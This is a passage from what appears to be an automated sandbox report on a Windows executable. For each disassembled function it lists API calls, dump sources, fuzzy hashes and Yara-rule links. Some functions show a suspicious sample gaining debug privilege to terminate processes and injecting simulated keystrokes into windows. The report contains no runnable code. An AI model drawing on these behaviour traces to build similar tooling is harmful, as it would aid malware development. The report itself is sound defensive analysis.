                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003EFD90
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003EFDBF
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003EFE36
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4090791747-0
                                                                                                                                                                      • Opcode ID: b45a8f569f0e0c2fa505b1e2f747b8b7940f7c1045ab0e4136d35e7548378864
                                                                                                                                                                      • Instruction ID: 80ff6815e5e0c11bb048406a45d28404c20cf3d208c3c8eac995f723a1bf7228
                                                                                                                                                                      • Opcode Fuzzy Hash: b45a8f569f0e0c2fa505b1e2f747b8b7940f7c1045ab0e4136d35e7548378864
                                                                                                                                                                      • Instruction Fuzzy Hash: 0CE1C3312043519FCB26EF25C481B6ABBE5AF84314F15866DF8999F3A2DB71EC40CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4F63, Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003D48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003D38D3,?), ref: 003D48C7
                                                                                                                                                                        • Part of subcall function 003D48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003D38D3,?), ref: 003D48E0
                                                                                                                                                                        • Part of subcall function 003D4CD3: GetFileAttributesW.KERNEL32(?,003D3947), ref: 003D4CD4
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003D4FE2
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D4FFC
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003D5017
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 793581249-0
                                                                                                                                                                      • Opcode ID: c03aa8b47baf7c0faaf992b1d139e511b72647ad93ccfc092d781cef9e63c26d
                                                                                                                                                                      • Instruction ID: f715f85b11660bac74696ed30942671b5e1ad26ba219a8565c5d5e3e6932378f
                                                                                                                                                                      • Opcode Fuzzy Hash: c03aa8b47baf7c0faaf992b1d139e511b72647ad93ccfc092d781cef9e63c26d
                                                                                                                                                                      • Instruction Fuzzy Hash: D55164B24087859BC726EBA0D8819DFB3ECAF84340F10492FF589D7151EF75A688C766
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F88B4, Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003F896E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                      • Opcode ID: 61e16dadb38ea2b71c230ca851fed55d90043a8cfbd2d4ec218cc9cd6c0f6d38
                                                                                                                                                                      • Instruction ID: f9efd720213a9be10504a77df01623cb9370d03b810e213ad3abbd31010e13d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e16dadb38ea2b71c230ca851fed55d90043a8cfbd2d4ec218cc9cd6c0f6d38
                                                                                                                                                                      • Instruction Fuzzy Hash: 6851A331A0020DBFDF2A9F28CC85BBA7B68EF05354F604112FA15EA5A1DF71A990CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372B72, Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadImageW.USER32 ref: 003AC547
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AC569
                                                                                                                                                                      • LoadImageW.USER32 ref: 003AC581
                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003AC59F
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003AC5C0
                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 003AC5CF
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003AC5EC
                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 003AC5FB
                                                                                                                                                                        • Part of subcall function 003FA71E: DeleteObject.GDI32(00000000), ref: 003FA757
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2819616528-0
                                                                                                                                                                      • Opcode ID: fdc936faf1a979e20512a0e999f7914750f046965957b90dd8a3a20beabd4c1e
                                                                                                                                                                      • Instruction ID: 092e107f5fe7cfb56ec166a3a3cc2177cc6217c0a783397b055f0baa6c7eda1e
                                                                                                                                                                      • Opcode Fuzzy Hash: fdc936faf1a979e20512a0e999f7914750f046965957b90dd8a3a20beabd4c1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 25518970A00209EFDB26DF25CC45FAA37B9EF59310F118528F946AB6A0DB74ED80DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9B50, Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003CAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 003CAE77
                                                                                                                                                                        • Part of subcall function 003CAE57: GetCurrentThreadId.KERNEL32 ref: 003CAE7E
                                                                                                                                                                        • Part of subcall function 003CAE57: AttachThreadInput.USER32(00000000,?,003C9B65,?,00000001), ref: 003CAE85
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003C9B70
                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003C9B8D
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003C9B90
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003C9B99
                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003C9BB7
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003C9BBA
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 003C9BC3
                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003C9BDA
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003C9BDD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                      • Opcode ID: c9aa982577c1825d36a27623dc53e1d7f1ecdc5903d55a08b9876ce121c8e9c1
                                                                                                                                                                      • Instruction ID: 66a3693dfc4798253af5d9ecc8dac70cf2eeb456177194de6182e9b75988fcef
                                                                                                                                                                      • Opcode Fuzzy Hash: c9aa982577c1825d36a27623dc53e1d7f1ecdc5903d55a08b9876ce121c8e9c1
                                                                                                                                                                      • Instruction Fuzzy Hash: EE11E172550618BEF7116B60DC89F6A7F2DEF4C755F110429F644EB1A0C9F25C10DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8E03, Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003C8A84,00000B00,?,?), ref: 003C8E0C
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,003C8A84,00000B00,?,?), ref: 003C8E13
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003C8A84,00000B00,?,?), ref: 003C8E28
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,003C8A84,00000B00,?,?), ref: 003C8E30
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,003C8A84,00000B00,?,?), ref: 003C8E33
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003C8A84,00000B00,?,?), ref: 003C8E43
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(003C8A84,00000000,?,003C8A84,00000B00,?,?), ref: 003C8E4B
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,003C8A84,00000B00,?,?), ref: 003C8E4E
                                                                                                                                                                      • CreateThread.KERNEL32 ref: 003C8E68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                      • Opcode ID: 9627de7399630957bb6d4b004cb4ece5f3c6a8bf5126f2b18d05a9f1ba5fb5f0
                                                                                                                                                                      • Instruction ID: 04a824741c8ce7aa1f8ea7ca5dea6ec1eb5eba0bd397b3147886cafb6ff239e4
                                                                                                                                                                      • Opcode Fuzzy Hash: 9627de7399630957bb6d4b004cb4ece5f3c6a8bf5126f2b18d05a9f1ba5fb5f0
                                                                                                                                                                      • Instruction Fuzzy Hash: B00154B6640348FFE611ABA5DC89F6B7BACEF89711F414421FA05DB2A1CA759810CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E9A72, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?,?,003C799D), ref: 003C766F
                                                                                                                                                                        • Part of subcall function 003C7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C768A
                                                                                                                                                                        • Part of subcall function 003C7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C7698
                                                                                                                                                                        • Part of subcall function 003C7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?), ref: 003C76A8
                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003E9B1B
                                                                                                                                                                      • _memset.LIBCMT ref: 003E9B28
                                                                                                                                                                      • _memset.LIBCMT ref: 003E9C6B
                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003E9C97
                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 003E9CA2
                                                                                                                                                                      Strings
                                                                                                                                                                      • NULL Pointer assignment, xrefs: 003E9CF0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                                                                      • Opcode ID: 52cb96d75147f8ba5236b5d1f17509f942ff826f38b6005ef7ba95ab508d2b96
                                                                                                                                                                      • Instruction ID: c1064d7eb3e7cfe0271c47627d4e32c442b0afdc578c6c6fa5e5da47fee27552
                                                                                                                                                                      • Opcode Fuzzy Hash: 52cb96d75147f8ba5236b5d1f17509f942ff826f38b6005ef7ba95ab508d2b96
                                                                                                                                                                      • Instruction Fuzzy Hash: 55911D71D00229ABDF11DF95DC85EDEBBB9EF08710F20816AF519AB281DB715A44CFA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6FEF, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003F7093
                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 003F70A7
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003F70C1
                                                                                                                                                                      • _wcscat.LIBCMT ref: 003F711C
                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 003F7133
                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003F7161
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                                                                      • Opcode ID: 7cb4789d69e6aeeee39c95dc649a9e8cec37e223a40ed8bdf284add2770aee24
                                                                                                                                                                      • Instruction ID: 871d273581ebfb20b583d51df058caa84fedfbb0208a93c1f6c23bbfbd93717f
                                                                                                                                                                      • Opcode Fuzzy Hash: 7cb4789d69e6aeeee39c95dc649a9e8cec37e223a40ed8bdf284add2770aee24
                                                                                                                                                                      • Instruction Fuzzy Hash: BA418F71A04309AFDB229F64CC85BFA77A8EF08350F11442AFA44A7291D7759D84CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EEC47, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003D3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 003D3EB6
                                                                                                                                                                        • Part of subcall function 003D3E91: Process32FirstW.KERNEL32(00000000,?), ref: 003D3EC4
                                                                                                                                                                        • Part of subcall function 003D3E91: CloseHandle.KERNEL32(00000000), ref: 003D3F8E
                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003EECB8
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003EECCB
                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003EECFA
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003EED77
                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 003EED82
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EEDB7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                      • Opcode ID: 47cd31cde4b0c42a848f0a1222669d994a1f9a281c3df76f79af68b20a64d8de
                                                                                                                                                                      • Instruction ID: 23a9b8caf3ff292aa0c652b4e4825406599f8b21cdaf75f6ecf995b6b04e85ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 47cd31cde4b0c42a848f0a1222669d994a1f9a281c3df76f79af68b20a64d8de
                                                                                                                                                                      • Instruction Fuzzy Hash: 1041BC712002119FDB22EF24CC96F6EB7A5AF80714F088159F9469F3C2DB79AC14CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D3226, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 003D32C5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                      • Opcode ID: e91989a7a8adc882d9050df47472acd70a866aeaf24a7acc572eeebcad45dd59
                                                                                                                                                                      • Instruction ID: 8670b07e2521ea0f573bf91231521827e33ca4cbfeccdfa44ab688a8463350ec
                                                                                                                                                                      • Opcode Fuzzy Hash: e91989a7a8adc882d9050df47472acd70a866aeaf24a7acc572eeebcad45dd59
                                                                                                                                                                      • Instruction Fuzzy Hash: 0111EB73B49356BB9B036A54FC42D6BB39CDF19370F20042BF900A6381D6665F4045BB
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4534, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003D454E
                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 003D4555
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003D456B
                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 003D4572
                                                                                                                                                                      • _wprintf.LIBCMT ref: 003D4598
                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003D45B6
                                                                                                                                                                      Strings
                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 003D4593
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                      • API String ID: 3648134473-3128320259
                                                                                                                                                                      • Opcode ID: 08fa65b578b770b1d6625ec3e92c942118428098cba1bed8d9c20cabb22e2ff5
                                                                                                                                                                      • Instruction ID: 1b8ab9fec3ccf953bba1f323705dfe10e2c25cb5759cc7163b75f99e70f5f53e
                                                                                                                                                                      • Opcode Fuzzy Hash: 08fa65b578b770b1d6625ec3e92c942118428098cba1bed8d9c20cabb22e2ff5
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E014FF7900208BFE712A7A0AD89EF7776CEB08301F4005A6BB45D2151EA749E858B75
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FD74C, Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 003FD78A
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 003FD7AA
                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003FD9E5
                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003FDA03
                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003FDA24
                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 003FDA43
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003FDA68
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 003FDA8B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1211466189-0
                                                                                                                                                                      • Opcode ID: 3571b167f3bf4c9d4289829de0f6512786d2b50ad33e3a50214b9614a8065e13
                                                                                                                                                                      • Instruction ID: 0d47b4f604b5496bde4f931e016c097b362637afc3583fab0fa72dbe173db7bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 3571b167f3bf4c9d4289829de0f6512786d2b50ad33e3a50214b9614a8065e13
                                                                                                                                                                      • Instruction Fuzzy Hash: 64B19A31600219EFDF16CF68C989BBE7BB2BF04701F098069EE489F299D774A950CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372A5B, Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003AC417,00000004,00000000,00000000,00000000), ref: 00372ACF
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,003AC417,00000004,00000000,00000000,00000000,000000FF), ref: 00372B17
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,003AC417,00000004,00000000,00000000,00000000), ref: 003AC46A
                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003AC417,00000004,00000000,00000000,00000000), ref: 003AC4D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
